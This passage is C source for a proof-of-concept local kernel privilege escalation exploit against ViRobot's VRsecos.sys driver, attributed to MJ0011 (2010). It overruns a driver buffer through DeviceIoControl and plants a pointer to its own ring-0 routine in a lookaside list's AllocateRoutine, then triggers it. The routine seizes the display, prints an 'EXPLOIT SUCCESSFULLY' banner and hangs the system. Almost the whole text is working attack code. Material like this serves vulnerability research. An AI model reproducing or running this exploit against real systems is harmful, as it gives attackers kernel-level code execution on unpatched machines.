    typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(
        PUCHAR Str
        );
    PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ;
    PINBV_RESET_DISPLAY InbvResetDisplay = 0 ;
    PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ;
    PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ;
    PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ;
    PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ;
    PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ;
    PINBV_DISPLAY_STRING InbvDisplayString= 0 ;
    #define VGA_COLOR_BLACK 0
    #define VGA_COLOR_RED 1
    #define VGA_COLOR_GREEN 2
    #define VGA_COLOR_GR 3
    #define VGA_COLOR_BULE 4
    #define VGA_COLOR_DARK_MEGAENTA 5
    #define VGA_COLOR_TURQUOISE 6
    #define VGA_COLOR_GRAY 7
    #define VGA_COLOR_BRIGHT_GRAY 8
    #define VGA_COLOR_BRIGHT_RED 9
    #define VGA_COLOR_BRIGHT_GREEN 10
    #define VGA_COLOR_BRIGHT_YELLOW 11
    #define VGA_COLOR_BRIGHT_BULE 12
    #define VGA_COLOR_BRIGHT_PURPLE 13
    #define VGA_COLOR_BRIGHT_TURQUOISE 14
    #define VGA_COLOR_WHITE 15
    UCHAR DisplayString[] =
    "                                                                                "
    "                                                                                "
    "                                                                                "
    "                ---- ===== EXPLOIT SUCCESSFULLY ==== ----                       "
    "                                                                                "
    "                                                                                "
    " ViRobot Desktop 5.5 & ViRobot Server 3.5 Local Privilege Escalation Exploit    "
    "                                                                                "
    " VULNERABLE PRODUCT                                                             "
    "                                                                                "
    " ViRobot Desktop 5.5 and below                                                  "
    " ViRobot Server 3.5 and below                                                   "
    "                                                                                "
    " VULERABLE FILE                                                                 "
    " VRsecos.sys <= 2008.8.1.1                                                      "
    "                                                                                "
    " AUTHOR                                                                         "
    "                                                                                "
    " MJ0011                                                                         "
    " th_decoder$126.com                                                             "
    "                                                                                "
    " 2010-8-22                                                                      "
    "                                                                                "
    "                                                                                "
    "                                                                                ";
     
    VOID InbvShellCode()
    {
    //DISABLE INTERRUPT
    __asm
    {
    cli
    }
    //RESET TO VGA MODE
    InbvAcquireDisplayOwnership();
    InbvResetDisplay();
    //FILL FULL SCREEN
    InbvSolidColorFill(0 , 0 , 639 , 479 ,VGA_COLOR_BLACK);
    //SET TEXT COLOR
    InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN);
    InbvInstallDisplayStringFilter(NULL);
    InbvEnableDisplayString(TRUE);
    InbvSetScrollRegion( 0 , 0 , 639 ,477);
    InbvDisplayString(DisplayString);
    while(TRUE)
    {
    };
    }
    BOOL InbvInit(PVOID ntosbase , PSTR ntosname)
    {
    HMODULE hlib = LoadLibrary(ntosname);
    if (hlib == NULL)
    {
    return FALSE ;
    }
    InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib , "InbvAcquireDisplayOwnership") - (ULONG)hlib + (ULONG)ntosbase);
    InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib , "InbvResetDisplay") - (ULONG)hlib + (ULONG)ntosbase);
    InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib , "InbvSolidColorFill") - (ULONG)hlib + (ULONG)ntosbase);
    InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib , "InbvSetTextColor") - (ULONG)hlib + (ULONG)ntosbase);
    InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib , "InbvInstallDisplayStringFilter") - (ULONG)hlib + (ULONG)ntosbase);
    InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvEnableDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
    InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib , "InbvSetScrollRegion") - (ULONG)hlib + (ULONG)ntosbase);
    InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
     
    if (InbvAcquireDisplayOwnership &&
    InbvResetDisplay &&
    InbvSolidColorFill &&
    InbvSetTextColor &&
    InbvInstallDisplayStringFilter &&
    InbvEnableDisplayString &&
    InbvSetScrollRegion &&
    InbvDisplayString)
    {
    return TRUE ;
    }
    return FALSE ;
    }
    int main(int argc, char* argv[])
    {
    printf("ViRotbot Desktop 5.5 & ViRobot Server 3.5 vrsecos.sys <= 2008.8.1.1\n"
    "Local Kernel Mode Privilege Escalation Vulnerability POC\n\n"
    "This Exploit Code Only for vrsecos == 2008.8.1.1\n"
    "Test On Windows XP SP3\n\n"
    "By MJ0011 th_decoder$126.com\n\n"
    "Press Enter\n");
    getchar();
    HANDLE hDev = CreateFile("\\\\.\\VRsecos" , FILE_READ_ATTRIBUTES , FILE_SHARE_READ , 0 , OPEN_EXISTING , 0 , 0 );
    if (hDev == INVALID_HANDLE_VALUE)
    {
    printf("cannot open device....%u\n" , GetLastError());
    //return 0;
    }
    //data for IoControlCode = 8307202C , buffer overrun
    PVOID pdata = malloc(0x2000);
    //fill non-zero data
    memset(pdata , 0x20 , 0x2000);
    //process mutx ...
    PX_KMUTANT pmutant = (PX_KMUTANT)((ULONG)pdata + 0x858 + 200);
    HANDLE hthread = OpenThread(THREAD_ALL_ACCESS , FALSE , GetCurrentThreadId());
    PSYSTEM_HANDLE_INFORMATION phi = (PSYSTEM_HANDLE_INFORMATION)GetInfoTable(SystemHandleInformation);
    PSYSTEM_MODULE_INFORMATION pmi = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
     
    //get base address of vrsecos.sys
    PVOID vrsecosbase = 0 ;
    ULONG i ;
    for (i = 0 ; i < pmi->Count ; i ++)
    {
    if (stricmp((PCHAR)(pmi->Module[i].ImageName + strlen(pmi->Module[i].ImageName ) - strlen("vrsecos.sys")) , "vrsecos.sys") == 0 )
    {
    vrsecosbase = pmi->Module[i].Base;
    break ;
    }
    }
    if (vrsecosbase == 0 )
    {
    printf("cannot find vrsecos....\n");
    //return 0 ;
    }
    if (!InbvInit(pmi->Module[0].Base , strrchr(pmi->Module[0].ImageName , '\\')+1))
    {
    printf("cannot init inbv system\n");
    return 0 ;
    }
    //get thread object
    PVOID MyThreadOBJ = NULL ;
    for (i = 0 ;  i < phi->NumberOfHandles ; i ++)
    {
    if (phi->Information[i].HandleValue == (USHORT)hthread &&
    phi->Information[i].UniqueProcessId == (USHORT)GetCurrentProcessId())
    {
    MyThreadOBJ = phi->Information[i].Object;
    break ;
    }
    }
    if (MyThreadOBJ == NULL)
    {
    printf("cannot find my thread object\n");
    return 0 ;
    }
    //for KeWaitForSignleObject
    //KeWaitForSignleObject will check SignalState
    pmutant->Header.SignalState = 0x30303030;
    pmutant->MutantListEntry.Flink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0 );
    pmutant->MutantListEntry.Blink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0) ;
    //for KeReleaseMutex , Mutant 's owner thread must be our thread when KeReleaseMutex
    pmutant->OwnerThread = MyThreadOBJ;
    //for IOCTL CODE 0x83072014
    //spec NPAGED_LOOKASIDE_LIST List
    //
    // user address space
    PVOID pAlloc = VirtualAlloc((PVOID)0x0A0A0A0A , 0x1000 , MEM_RESERVE|MEM_COMMIT , PAGE_READWRITE);
    if (pAlloc == NULL)
    {
    printf("cannot allocate spec addr %u\n! ", GetLastError());
    return 0 ;
    }
    *(DWORD*)0x0a0a0101 = 0 ;
    // vrsecos+2d68 < vrsecos+2d64
    // and vrsecos+2d68 < 0
    *(DWORD*)((ULONG)pdata + 0x81c +200) = 0xc1c1c1c1 ;
    *(DWORD*)((ULONG)pdata + 0x820 + 200) = 0xc0c0c0c0 ;
    //fill NPAGED_LOOKASIDE_LIST
    *(DWORD*)((ULONG)pdata + 0xdd8 + 200) = 0x0a0a0101;
    *(DWORD*)((ULONG)pdata + 0xddc +200 ) = 0x01010101 ;
    //fill NPAGE_LOOKASIDE_LIST->AllocateRoutine
    //is our R0 Shell Code !!!
    *(DWORD*)((ULONG)pdata + 0xdd8 + 0x28 +200 ) = (DWORD)InbvShellCode;
    ULONG btr ;
    ULONG temp;
    //memory overflow!!
    if (!DeviceIoControl(hDev , 0x8307202c , pdata , 0x1000 , NULL , 0 , &btr , NULL ))
    {
    printf("dev ctl 1 failed %u\n", GetLastError());
    return 0 ;
    }
    PVOID pdata2 = malloc(0x6d4);
    *(DWORD*)pdata2 = 1;
    *(ULONG*)((ULONG)pdata2 + 8 ) = 0 ;
    strcpy((PCHAR)((ULONG)pdata2 + 264) , "exploit you !");
    strcpy((PCHAR)((ULONG)pdata2 + 464) , "exploit you !!");
    //first time , NPAGED_LOOKASIDE_LIST got ZERO !!
    if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
    {
    printf("dev ctrl 2 failed %u\n", GetLastError());
    return 0 ;
    }
    //second time , go NPAGED_LOOKASIDE_LIST->AllocateRoutine!!
    if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
    {
    printf("dev ctrl 2 failed %u\n", GetLastError());
    return 0 ;
    }
    return 0 ;
    }
    
    